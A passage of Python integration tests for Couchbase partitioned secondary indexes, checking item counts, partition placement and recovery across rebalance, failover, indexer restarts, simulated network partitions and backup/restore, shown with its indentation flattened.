index_data_before = {}
for index in index_names:
_, total_item_count_before, _ = self.get_stats_for_partitioned_indexes(
index_name=index)
index_data_before[index] = {}
index_data_before[index]["item_count"] = total_item_count_before
index_data_before[index][
"index_metadata"] = self.rest.get_indexer_metadata()
# rebalance in an indexer node
try:
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[node_in], [],
services=services_in)
reached = RestHelper(self.rest).rebalance_reached()
remote_client = RemoteMachineShellConnection(node_to_fail)
if self.node_operation == "kill_indexer":
remote_client.terminate_process(process_name="indexer")
elif self.node_operation == "kill_kv":
remote_client.kill_memcached()
else:
self.reboot_node(node_to_fail)
remote_client.disconnect()
# wait for restart and warmup on all node
self.sleep(self.wait_timeout)
# wait till node is ready after warmup
ClusterOperationHelper.wait_for_ns_servers_or_assert([node_to_fail],
self,
wait_if_warmup=True)
rebalance.result()
except Exception as ex:
self.log.info(str(ex))
# Rerun Rebalance
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[], [])
self.sleep(30)
reached_rerun = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached_rerun, "rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(10)
# Get Stats and index partition map after rebalance
node_list = copy.deepcopy(self.node_list)
node_list.append(node_in_str)
self.log.info(node_list)
index_data_after = {}
for index in index_names:
self.index_servers = self.get_nodes_from_services_map(
service_type="index", get_all_nodes=True)
_, total_item_count_after, _ = self.get_stats_for_partitioned_indexes(
index_name=index, node_list=node_list)
index_data_after[index] = {}
index_data_after[index]["item_count"] = total_item_count_after
index_data_after[index][
"index_metadata"] = RestConnection(self.index_servers[0]).get_indexer_metadata()
for index in index_names:
# Validate index item count before and after
self.assertEqual(index_data_before[index]["item_count"],
index_data_after[index]["item_count"],
"Item count in index do not match after cluster ops.")
# Validate host list, partition count and partition distribution
self.assertTrue(
self.validate_partition_distribution_after_cluster_ops(
index, index_data_before[index]["index_metadata"],
index_data_after[index]["index_metadata"], [node_in],
[]),
"Partition distribution post cluster ops has some issues")
def test_replica_partition_index_with_excluded_nodes_failover(self):
self._load_emp_dataset(end=self.num_items)
# Setting to exclude a node for planner
self.rest.set_index_planner_settings("excludeNode=in")
# Create partitioned index
create_index_statement = "CREATE INDEX idx1 on default(name,dept,salary) partition by hash(name) with {{'num_replica':{0}}}".format(
self.num_index_replicas)
try:
self.n1ql_helper.run_cbq_query(
query=create_index_statement,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata :::")
self.log.info(index_metadata)
self.assertTrue(self.validate_partition_map(index_metadata, "idx1",
self.num_index_replicas,
self.num_index_partitions),
"Partition map validation failed")
# Validate index created and check the hosts on which partitions are hosted.
expected_hosts = self.node_list[1:]
expected_hosts.sort()
index_names = []
index_names.append("idx1")
for i in range(1, self.num_index_replicas + 1):
index_names.append("idx1 (replica {0})".format(str(i)))
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata :::")
self.log.info(index_metadata)
index_validated = 0
for index_name in index_names:
for index in index_metadata["status"]:
if index["name"] == index_name:
self.log.info("Expected Hosts : {0}".format(expected_hosts))
self.log.info("Actual Hosts : {0}".format(index["hosts"]))
self.assertEqual(index["hosts"].sort(), expected_hosts.sort(),
"Planner did not ignore excluded node during index creation for {0}".format(
index_name))
index_validated += 1
self.assertEqual(index_validated, (self.num_index_replicas + 1),
"All index replicas not created")
node_out = self.servers[self.node_out]
node_out_str = node_out.ip + ":" + str(node_out.port)
# failover and rebalance out a indexer node
failover_task = self.cluster.async_failover(
self.servers[:self.nodes_init],
[node_out],
self.graceful, wait_for_pending=180)
failover_task.result()
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[], [node_out])
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(30)
node_list = copy.deepcopy(self.node_list[1:])
if node_out_str in node_list:
node_list.remove(node_out_str)
self.log.info(node_list)
index_data_after = {}
total_index_item_count = 0
bucket_item_count = 0
total_partition_count = 0
for index in index_names:
self.index_servers = self.get_nodes_from_services_map(
service_type="index", get_all_nodes=True)
bucket_item_count, total_item_count_after, _ = self.get_stats_for_partitioned_indexes(
index_name=index, node_list=node_list)
index_data_after[index] = {}
index_data_after[index]["item_count"] = total_item_count_after
index_data_after[index][
"index_metadata"] = RestConnection(self.index_servers[0]).get_indexer_metadata()
total_index_item_count += total_item_count_after
total_partition_count += self.get_num_partitions_for_index(
self.rest.get_indexer_metadata(), index)
self.assertEqual(total_index_item_count, bucket_item_count,
"Item count in index do not match after cluster ops.")
self.assertEqual(self.num_index_partitions, total_partition_count,
"Some partitions are not available after rebalance")
def test_replica_partition_index_with_excluded_nodes_failover_addback(self):
self._load_emp_dataset(end=self.num_items)
# Setting to exclude a node for planner
self.rest.set_index_planner_settings("excludeNode=in")
# Create partitioned index
create_index_statement = "CREATE INDEX idx1 on default(name,dept,salary) partition by hash(name) with {{'num_replica':{0}}}".format(
self.num_index_replicas)
try:
self.n1ql_helper.run_cbq_query(
query=create_index_statement,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata :::")
self.log.info(index_metadata)
self.assertTrue(self.validate_partition_map(index_metadata, "idx1",
self.num_index_replicas,
self.num_index_partitions),
"Partition map validation failed")
# Validate index created and check the hosts on which partitions are hosted.
expected_hosts = self.node_list[1:]
expected_hosts.sort()
index_names = []
index_names.append("idx1")
for i in range(1, self.num_index_replicas + 1):
index_names.append("idx1 (replica {0})".format(str(i)))
# Need to see if the indexes get created in the first place
# Validate index created and check the hosts on which partitions are hosted.
expected_hosts = self.node_list[1:]
expected_hosts.sort()
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata :::")
self.log.info(index_metadata)
index_validated = 0
for index_name in index_names:
for index in index_metadata["status"]:
if index["name"] == index_name:
self.log.info("Expected Hosts : {0}".format(expected_hosts))
self.log.info("Actual Hosts : {0}".format(index["hosts"]))
self.assertEqual(index["hosts"], expected_hosts,
"Planner did not ignore excluded node during index creation for {0}".format(
index_name))
index_validated += 1
self.assertEqual(index_validated, (self.num_index_replicas + 1),
"All index replicas not created")
node_out = self.servers[self.node_out]
node_out_str = node_out.ip + ":" + str(node_out.port)
# failover and rebalance out a indexer node
nodes_all = self.rest.node_statuses()
for node in nodes_all:
if node.ip == node_out.ip:
break
failover_task = self.cluster.async_failover(
self.servers[:self.nodes_init],
[node_out],
self.graceful, wait_for_pending=180)
failover_task.result()
self.rest.set_recovery_type(node.id, self.recovery_type)
self.rest.add_back_node(node.id)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[], [])
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata :::")
self.log.info(index_metadata)
self.assertTrue(self.validate_partition_map(index_metadata, "idx1",
self.num_index_replicas,
self.num_index_partitions),
"Partition map validation failed")
def test_partition_placement_one_node_in_paused_state(self):
index_server = self.index_servers[0]
create_index_query1 = "CREATE PRIMARY INDEX ON default USING GSI"
create_index_query2 = "CREATE INDEX idx_job_title ON default(job_title) USING GSI"
create_index_query3 = "CREATE INDEX idx_join_yr ON default(join_yr) USING GSI"
create_index_query4 = "CREATE INDEX idx_job_title_join_yr ON default(job_title,join_yr) USING GSI"
try:
self.n1ql_helper.run_cbq_query(query=create_index_query1,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_index_query2,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_index_query3,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_index_query4,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation failed with error : {0}".format(str(ex)))
self.rest.set_service_memoryQuota(service='indexMemoryQuota',
memoryQuota=256)
# Ensure indexer reaches to paused state
self._saturate_indexer_memory(index_server)
services_in = ["index"]
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[self.servers[
self.nodes_init]], [],
services=services_in)
rebalance.result()
create_index_query = "CREATE INDEX pidx1 ON default(name,mutated) partition by hash(BASE64(meta().id)) USING GSI"
try:
self.n1ql_helper.run_cbq_query(query=create_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation failed with error : {0}".format(str(ex)))
index_map = self.get_index_map()
self.log.info(index_map)
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata Before Build:")
self.log.info(index_metadata)
index_details = {}
index_details["index_name"] = "pidx1"
index_details["num_partitions"] = self.num_index_partitions
index_details["defer_build"] = False
self.assertTrue(
self.validate_partitioned_indexes(index_details, index_map,
index_metadata),
"Partitioned index created not as expected")
index_node_list = self.node_list
index_node_list.append(
self.servers[self.nodes_init].ip + ":" + self.servers[
self.nodes_init].port)
index_node_list.remove(index_server.ip + ":" + index_server.port)
index_node_list.sort()
validated = False
for index in index_metadata["status"]:
if index["name"] == "pidx1":
self.log.info("Expected Hosts : {0}".format(index_node_list))
self.log.info("Actual Hosts : {0}".format(index["hosts"]))
self.assertEqual(index["hosts"], index_node_list,
"Planner did not exclude node in Paused state during index creation")
validated = True
if not validated:
self.fail("Looks like index was not created.")
def test_index_scans_one_node_memory_saturated(self):
index_server = self.index_servers[0]
index_server_str = index_server.ip + ":" + index_server.port
create_index_query1 = "CREATE PRIMARY INDEX ON default USING GSI with {{'nodes':['{0}']}}".format(
index_server_str)
create_index_query2 = "CREATE INDEX idx_job_title ON default(job_title) USING GSI with {{'nodes':['{0}']}}".format(
index_server_str)
create_index_query3 = "CREATE INDEX idx_join_yr ON default(join_yr) USING GSI with {{'nodes':['{0}']}}".format(
index_server_str)
create_index_query4 = "CREATE INDEX idx_job_title_join_yr ON default(job_title,join_yr) USING GSI with {{'nodes':['{0}']}}".format(
index_server_str)
create_index_query5 = "CREATE INDEX pidx1 ON default(name,mutated) partition by hash(BASE64(meta().id)) USING GSI"
try:
self.n1ql_helper.run_cbq_query(query=create_index_query1,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_index_query2,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_index_query3,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_index_query4,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_index_query5,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation failed with error : {0}".format(str(ex)))
query = "select name,mutated from default where name is not null order by name limit 1000"
results = self.n1ql_helper.run_cbq_query(query=query,
server=self.n1ql_node)
self.assertIsNotNone(results["results"], "No results")
num_results_before = results["metrics"]["resultCount"]
self.log.info("num_results_before : {0}".format(num_results_before))
self.rest.set_service_memoryQuota(service='indexMemoryQuota',
memoryQuota=256)
# Ensure indexer reaches to paused state
self._saturate_indexer_memory(index_server)
query = "select name,mutated from default where name is not null order by name limit 1000"
results = self.n1ql_helper.run_cbq_query(query=query,
server=self.n1ql_node)
self.assertIsNotNone(results["results"], "No results")
num_results_after = results["metrics"]["resultCount"]
self.log.info("num_results_after : {0}".format(str(num_results_after)))
def test_rebalance_out_concurrent_querying_one_node_nw_partitioned(self):
self._load_emp_dataset(end=self.num_items)
# Create partitioned index
create_index_statement = "CREATE INDEX idx1 on default(name,dept,salary) partition by hash(name) with {{'num_replica':{0}, 'num_partition':{1}}}".format(
self.num_index_replicas, self.num_index_partitions)
create_primary_index_statement = "CREATE PRIMARY INDEX pidx1 on default partition by hash(meta().id) with {{'num_replica':{0}, 'num_partition':{1}}}".format(
self.num_index_replicas, self.num_index_partitions)
try:
self.n1ql_helper.run_cbq_query(
query=create_index_statement,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(
query=create_primary_index_statement,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.sleep(30)
# Get Index Names
index_names = ["idx1", "pidx1"]
if self.num_index_replicas > 0:
for i in range(1, self.num_index_replicas + 1):
index_names.append("idx1 (replica {0})".format(str(i)))
index_names.append("pidx1 (replica {0})".format(str(i)))
self.log.info(index_names)
# Get Stats and index partition map before rebalance
index_data_before = {}
for index in index_names:
_, total_item_count_before, _ = self.get_stats_for_partitioned_indexes(
index_name=index)
index_data_before[index] = {}
index_data_before[index]["item_count"] = total_item_count_before
index_data_before[index][
"index_metadata"] = self.rest.get_indexer_metadata()
node_out = self.servers[self.node_out]
node_out_str = node_out.ip + ":" + str(node_out.port)
node_nw_partition_out = self.servers[self.node_out - 1]
self.start_firewall_on_node(node_nw_partition_out)
# start querying
query = "select name,dept,salary from default where name is not missing and dept='HR' and salary > 120000;"
t1 = Thread(target=self._run_queries, args=(query, 30,))
t1.start()
# rebalance out a indexer node when querying is in progress
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[], [node_out])
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
t1.join()
self.sleep(30)
self.stop_firewall_on_node(node_nw_partition_out)
# Get Stats and index partition map after rebalance
node_list = copy.deepcopy(self.node_list)
node_list.remove(node_out_str)
self.log.info(node_list)
index_data_after = {}
for index in index_names:
_, total_item_count_after, _ = self.get_stats_for_partitioned_indexes(
index_name=index, node_list=node_list)
index_data_after[index] = {}
index_data_after[index]["item_count"] = total_item_count_after
index_data_after[index][
"index_metadata"] = self.rest.get_indexer_metadata()
for index in index_names:
# Validate index item count before and after
self.assertEqual(index_data_before[index]["item_count"],
index_data_after[index]["item_count"],
"Item count in index do not match after cluster ops.")
# Validate host list, partition count and partition distribution
self.assertTrue(
self.validate_partition_distribution_after_cluster_ops(
index, index_data_before[index]["index_metadata"],
index_data_after[index]["index_metadata"], [],
[node_out]),
"Partition distribution post cluster ops has some issues")
def test_rebalance_out_concurrent_querying_server_group_nw_partitioned(
self):
self._load_emp_dataset(end=self.num_items)
self._create_server_groups()
# Create partitioned index
create_index_statement = "CREATE INDEX idx1 on default(name,dept,salary) partition by hash(name) with {{'num_replica':{0}, 'num_partition':{1}}}".format(
self.num_index_replicas, self.num_index_partitions)
create_primary_index_statement = "CREATE PRIMARY INDEX pidx1 on default partition by hash(meta().id) with {{'num_replica':{0}, 'num_partition':{1}}}".format(
self.num_index_replicas, self.num_index_partitions)
try:
self.n1ql_helper.run_cbq_query(
query=create_index_statement,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(
query=create_primary_index_statement,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.sleep(30)
# Get Index Names
index_names = ["idx1", "pidx1"]
if self.num_index_replicas > 0:
for i in range(1, self.num_index_replicas + 1):
index_names.append("idx1 (replica {0})".format(str(i)))
index_names.append("pidx1 (replica {0})".format(str(i)))
self.log.info(index_names)
# Get Stats and index partition map before rebalance
index_data_before = {}
for index in index_names:
_, total_item_count_before, _ = self.get_stats_for_partitioned_indexes(
index_name=index)
index_data_before[index] = {}
index_data_before[index]["item_count"] = total_item_count_before
index_data_before[index][
"index_metadata"] = self.rest.get_indexer_metadata()
node_out = self.servers[self.node_out]
node_out_str = node_out.ip + ":" + str(node_out.port)
# Network partition out Server Group
server_group_out = self.input.param("server_group_out", None)
server_group_nodes = []
if server_group_out:
server_group_nodes = server_group_out.split(":")
for node in server_group_nodes:
self.start_firewall_on_node(node)
# start querying
query = "select name,dept,salary from default where name is not missing and dept='HR' and salary > 120000;"
t1 = Thread(target=self._run_queries, args=(query, 30,))
t1.start()
# rebalance out a indexer node when querying is in progress
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[], [node_out])
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
t1.join()
self.sleep(30)
if server_group_nodes:
for node in server_group_nodes:
self.stop_firewall_on_node(node)
# Get Stats and index partition map after rebalance
node_list = copy.deepcopy(self.node_list)
node_list.remove(node_out_str)
self.log.info(node_list)
index_data_after = {}
for index in index_names:
_, total_item_count_after, _ = self.get_stats_for_partitioned_indexes(
index_name=index, node_list=node_list)
index_data_after[index] = {}
index_data_after[index]["item_count"] = total_item_count_after
index_data_after[index][
"index_metadata"] = self.rest.get_indexer_metadata()
for index in index_names:
# Validate index item count before and after
self.assertEqual(index_data_before[index]["item_count"],
index_data_after[index]["item_count"],
"Item count in index do not match after cluster ops.")
# Validate host list, partition count and partition distribution
self.assertTrue(
self.validate_partition_distribution_after_cluster_ops(
index, index_data_before[index]["index_metadata"],
index_data_after[index]["index_metadata"], [],
[node_out]),
"Partition distribution post cluster ops has some issues")
def test_partitioned_index_recoverability(self):
node_out = self.servers[self.node_out]
create_index_query = "CREATE INDEX idx1 ON default(name,mutated) partition by hash(meta().id) USING GSI"
if self.num_index_replicas:
create_index_query += " with {{'num_replica':{0}}};".format(
self.num_index_replicas)
try:
self.n1ql_helper.run_cbq_query(query=create_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation failed with error : {0}".format(str(ex)))
# Allow index to be built completely
self.sleep(30)
# Run query
scan_query = "select name,mutated from default where name > 'a' and mutated >=0;"
try:
result_before = self.n1ql_helper.run_cbq_query(query=scan_query, min_output_size=10000000,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail("Scan failed")
# Kill indexer and allow it to recover and rebuild index
remote = RemoteMachineShellConnection(node_out)
remote.terminate_process(process_name="indexer")
self.sleep(30, "Sleep after killing indexer")
# Run same query again and check if results match from before recovery
scan_query = "select name,mutated from default where name > 'a' and mutated >=0;"
try:
result_after = self.n1ql_helper.run_cbq_query(query=scan_query, min_output_size=10000000,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail("Scan failed")
# Validate if the same count of docs are returned after recovery
self.assertEqual(result_before["metrics"]["resultCount"], result_after["metrics"]["resultCount"], "No. of rows returned before recovery and after recovery are different")
def test_backup_restore_partitioned_index(self):
self._load_emp_dataset(end=self.num_items)
index_details = []
index_detail = {}
index_detail["index_name"] = "idx1"
index_detail["num_partitions"] = self.num_index_partitions
index_detail["defer_build"] = False
index_detail[
"definition"] = "CREATE INDEX idx1 on default(name,dept) partition by hash(salary) USING GSI"
index_details.append(index_detail)
index_detail = {}
index_detail["index_name"] = "idx2"
index_detail["num_partitions"] = 64
index_detail["defer_build"] = False
index_detail[
"definition"] = "CREATE INDEX idx2 on default(name,dept) partition by hash(salary) USING GSI with {'num_partition':64}"
index_details.append(index_detail)
index_detail = {}
index_detail["index_name"] = "idx3"
index_detail["num_partitions"] = self.num_index_partitions
index_detail["defer_build"] = False
index_detail[
"definition"] = "CREATE INDEX idx3 on default(name,dept) partition by hash(salary) USING GSI with {'num_replica':1}"
index_details.append(index_detail)
index_detail = {}
index_detail["index_name"] = "idx4"
index_detail["num_partitions"] = self.num_index_partitions
index_detail["defer_build"] = True
index_detail[
"definition"] = "CREATE INDEX idx4 on default(name,dept) partition by hash(salary) USING GSI with {'defer_build':true}"
index_details.append(index_detail)
index_detail = {}
try:
for index in index_details:
self.n1ql_helper.run_cbq_query(query=index["definition"],
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail("index creation failed with error : {0}".format(str(ex)))
self.sleep(10)
index_map = self.get_index_map()
self.log.info(index_map)
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata Before Build:")
self.log.info(index_metadata)
for index_detail in index_details:
self.assertTrue(
self.validate_partitioned_indexes(index_detail, index_map,
index_metadata),
"Partitioned index created not as expected")
kv_node = self.get_nodes_from_services_map(service_type="kv",
get_all_nodes=False)
self._create_backup(kv_node)
# Drop and recreate bucket
self.cluster.bucket_delete(kv_node, bucket="default")
default_params = self._create_bucket_params(server=self.master,
size=self.bucket_size,
replicas=self.num_replicas)
self.cluster.create_default_bucket(default_params)
if self.node_out > 0:
node_out = self.servers[self.node_out]
rebalance = self.cluster.async_rebalance(
self.servers[:self.nodes_init],
[], [node_out])
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached,
"rebalance failed, stuck or did not complete")
rebalance.result()
# Restore backup
self._create_restore(kv_node)
self.sleep(60)
# Validate all indexes restored correctly
index_map = self.get_index_map()
self.log.info(index_map)
if self.node_out > 0:
if self.node_out == self.index_servers[0]:
rest = RestConnection(self.index_servers[1])
else:
rest = self.rest
else:
rest = self.rest
index_metadata = rest.get_indexer_metadata()
self.log.info("Indexer Metadata After Build:")
self.log.info(index_metadata)
# After restore, all indexes are going to be in unbuilt. So change the expected state of indexes.
for index in index_details:
index["defer_build"] = True
for index_detail in index_details:
self.assertTrue(
self.validate_partitioned_indexes(index_detail, index_map,
index_metadata),
"Partitioned index created not as expected")
def test_backup_partitioned_index_with_failed_node(self):
self._load_emp_dataset(end=self.num_items)
node_out = self.servers[self.node_out]
index_details = []
index_detail = {}
index_detail["index_name"] = "idx1"
index_detail["num_partitions"] = self.num_index_partitions
index_detail["defer_build"] = False
index_detail[
"definition"] = "CREATE INDEX idx1 on default(name,dept) partition by hash(salary) USING GSI"
index_details.append(index_detail)
index_detail = {}
index_detail["index_name"] = "idx2"
index_detail["num_partitions"] = 64
index_detail["defer_build"] = False
index_detail[
"definition"] = "CREATE INDEX idx2 on default(name,dept) partition by hash(salary) USING GSI with {'num_partition':64}"
index_details.append(index_detail)
index_detail = {}
index_detail["index_name"] = "idx3"
index_detail["num_partitions"] = self.num_index_partitions
index_detail["defer_build"] = False
index_detail[
"definition"] = "CREATE INDEX idx3 on default(name,dept) partition by hash(salary) USING GSI with {'num_replica':1}"
index_details.append(index_detail)
index_detail = {}
index_detail["index_name"] = "idx4"
index_detail["num_partitions"] = self.num_index_partitions
index_detail["defer_build"] = True
index_detail[
"definition"] = "CREATE INDEX idx4 on default(name,dept) partition by hash(salary) USING GSI with {'defer_build':true}"
index_details.append(index_detail)
index_detail = {}
try:
for index in index_details:
self.n1ql_helper.run_cbq_query(query=index["definition"],
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail("index creation failed with error : {0}".format(str(ex)))
self.sleep(10)
index_map = self.get_index_map()
self.log.info(index_map)
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata Before Build:")
self.log.info(index_metadata)
for index_detail in index_details:
self.assertTrue(
self.validate_partitioned_indexes(index_detail, index_map,
index_metadata),
"Partitioned index created not as expected")
kv_node = self.get_nodes_from_services_map(service_type="kv",
get_all_nodes=False)
try:
# Stop couchbase on indexer node before taking backup if test config specifies it
remote = RemoteMachineShellConnection(node_out)
remote.stop_couchbase()
self.sleep(30, "Allow node to be marked as a failed node")
self._create_backup(kv_node)
except Exception as ex:
self.log.info(str(ex))
finally:
remote = RemoteMachineShellConnection(node_out)
remote.start_couchbase()
def test_restore_partitioned_index_with_failed_node(self):
self._load_emp_dataset(end=self.num_items)
node_out = self.servers[self.node_out]
index_details = []
index_detail = {}
index_detail["index_name"] = "idx1"
index_detail["num_partitions"] = self.num_index_partitions
index_detail["defer_build"] = False
index_detail[
"definition"] = "CREATE INDEX idx1 on default(name,dept) partition by hash(salary) USING GSI"
index_details.append(index_detail)
index_detail = {}
index_detail["index_name"] = "idx2"
index_detail["num_partitions"] = 64
index_detail["defer_build"] = False
index_detail[
"definition"] = "CREATE INDEX idx2 on default(name,dept) partition by hash(salary) USING GSI with {'num_partition':64}"
index_details.append(index_detail)
index_detail = {}
index_detail["index_name"] = "idx3"
index_detail["num_partitions"] = self.num_index_partitions
index_detail["defer_build"] = False
index_detail[
"definition"] = "CREATE INDEX idx3 on default(name,dept) partition by hash(salary) USING GSI with {'num_replica':1}"
index_details.append(index_detail)
index_detail = {}
index_detail["index_name"] = "idx4"
index_detail["num_partitions"] = self.num_index_partitions
index_detail["defer_build"] = True
index_detail[
"definition"] = "CREATE INDEX idx4 on default(name,dept) partition by hash(salary) USING GSI with {'defer_build':true}"
index_details.append(index_detail)
index_detail = {}
try:
for index in index_details:
self.n1ql_helper.run_cbq_query(query=index["definition"],
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail("index creation failed with error : {0}".format(str(ex)))
self.sleep(10)
index_map = self.get_index_map()
self.log.info(index_map)
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata Before Build:")
self.log.info(index_metadata)
for index_detail in index_details:
self.assertTrue(
self.validate_partitioned_indexes(index_detail, index_map,
index_metadata),
"Partitioned index created not as expected")
kv_node = self.get_nodes_from_services_map(service_type="kv",
get_all_nodes=False)
self._create_backup(kv_node)
# Drop and recreate bucket
self.cluster.bucket_delete(kv_node, bucket="default")
default_params = self._create_bucket_params(server=self.master,
size=self.bucket_size,
replicas=self.num_replicas)
self.cluster.create_default_bucket(default_params)
try:
# Restore backup
# Stop couchbase on indexer node before restoring backup if test config specifies it
remote = RemoteMachineShellConnection(node_out)
remote.stop_couchbase()
self.sleep(30, "Allow node to be marked as a failed node")
self._create_restore(kv_node)
except Exception as ex:
self.log.info(str(ex))
finally:
remote = RemoteMachineShellConnection(node_out)
remote.start_couchbase()
def test_backup_restore_partitioned_index_default_num_partitions(self):
self._load_emp_dataset(end=self.num_items)
index_details = []
index_detail = {}
index_detail["index_name"] = "idx1"
index_detail["num_partitions"] = self.num_index_partitions
index_detail["defer_build"] = False
index_detail[
"definition"] = "CREATE INDEX idx1 on default(name,dept) partition by hash(salary) USING GSI"
index_detail["num_partitions_post_restore"] = 8
index_details.append(index_detail)
index_detail = {}
index_detail["index_name"] = "idx2"
index_detail["num_partitions"] = 64
index_detail["defer_build"] = False
index_detail[
"definition"] = "CREATE INDEX idx2 on default(name,dept) partition by hash(salary) USING GSI with {'num_partition':64}"
index_detail["num_partitions_post_restore"] = 64
index_details.append(index_detail)
index_detail = {}
try:
for index in index_details:
self.n1ql_helper.run_cbq_query(query=index["definition"],
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail("index creation failed with error : {0}".format(str(ex)))
self.sleep(10)
index_map = self.get_index_map()
self.log.info(index_map)
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata Before Build:")
self.log.info(index_metadata)
for index_detail in index_details:
self.assertTrue(
self.validate_partitioned_indexes(index_detail, index_map,
index_metadata),
"Partitioned index created not as expected")
kv_node = self.get_nodes_from_services_map(service_type="kv",
get_all_nodes=False)
self._create_backup(kv_node)
# Drop and recreate bucket
self.cluster.bucket_delete(kv_node, bucket="default")
default_params = self._create_bucket_params(server=self.master,
size=self.bucket_size,
replicas=self.num_replicas)
self.cluster.create_default_bucket(default_params)
# Set default number of partitions
self.rest.set_index_settings(
{"indexer.numPartitions": 4})
# Change expected num of partitions
for index in index_details:
index["num_partitions"] = index["num_partitions_post_restore"]
# Restore backup
self._create_restore(kv_node)
self.sleep(60)
# Validate all indexes restored correctly
index_map = self.get_index_map()
self.log.info(index_map)
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata After Build:")
self.log.info(index_metadata)
# After restore, all indexes are going to be in unbuilt. So change the expected state of indexes.
for index in index_details:
index["defer_build"] = True
for index_detail in index_details:
self.assertTrue(
self.validate_partitioned_indexes(index_detail, index_map,
index_metadata),
"Partitioned index created not as expected")
def get_stats_for_partitioned_indexes(self, bucket_name="default",
index_name=None, node_list=None):
if node_list == None:
node_list = self.node_list
bucket_item_count = self.get_item_count(self.servers[0], bucket_name)
index_stats = self.get_index_stats(perNode=True)
total_item_count = 0
total_items_processed = 0
for node in node_list:
if not index_name:
index_names = []
for key in index_stats[node][bucket_name]:
index_names.append(key)
index_name = index_names[0]
try:
total_item_count += index_stats[node][bucket_name][index_name][
"items_count"]
total_items_processed = \
index_stats[node][bucket_name][index_name][
"num_docs_processed"]
except Exception as ex:
self.log.info(str(ex))
self.log.info(
"Index {0} : Total Item Count={1} Total Items Processed={2}".format(
index_name, str(total_item_count), str(total_items_processed)))
return (bucket_item_count, total_item_count, total_items_processed)
# Description : Validate index metadata : num_partitions, index status, index existence
def validate_partitioned_indexes(self, index_details, index_map,
index_metadata, skip_numpartitions_check=False):
isIndexPresent = False
isNumPartitionsCorrect = False
isDeferBuildCorrect = False
# Check if index exists
for index in index_metadata["status"]:
if index["name"] == index_details["index_name"]:
isIndexPresent = True
# If num-partitions are set, check no. of partitions
expected_num_partitions = 16
if index_details["num_partitions"] > 0:
expected_num_partitions = index_details["num_partitions"]
if index["partitioned"] and index[
"numPartition"] == expected_num_partitions:
isNumPartitionsCorrect = True
else:
self.log.info(
"Index {0} on /getIndexStatus : Partitioned={1}, num_partition={2}.. Expected numPartitions={3}".format(
index["name"], index["partitioned"],
index["numPartition"],
index_details["num_partitions"]))
if index_details["defer_build"] == True and index[
"status"] == "Created":
isDeferBuildCorrect = True
elif index_details["defer_build"] == False and index[
"status"] == "Ready":
isDeferBuildCorrect = True
else:
self.log.info(
"Incorrect build status for index created with defer_build=True. Status for {0} is {1}".format(
index["name"], index["status"]))
if not isIndexPresent:
self.log.info("Index not listed in /getIndexStatus")
if skip_numpartitions_check:
return isIndexPresent and isDeferBuildCorrect
else:
return isIndexPresent and isNumPartitionsCorrect and isDeferBuildCorrect
# Description : Checks if same host contains same partitions from different replica, and also if for each replica, if the partitions are distributed across nodes
def validate_partition_map(self, index_metadata, index_name, num_replica, num_partitions,dropped_replica=False, replicaId=0):
index_names = []
index_names.append(index_name)
hosts = []
# hosts = index_metadata["status"][0]["hosts"]
for index in index_metadata['status']:
for host in index['hosts']:
if host not in hosts:
hosts.append(host)
for i in range(1, num_replica + 1):
if dropped_replica:
if not i == replicaId:
index_names.append(index_name + " (replica {0})".format(str(i)))
else:
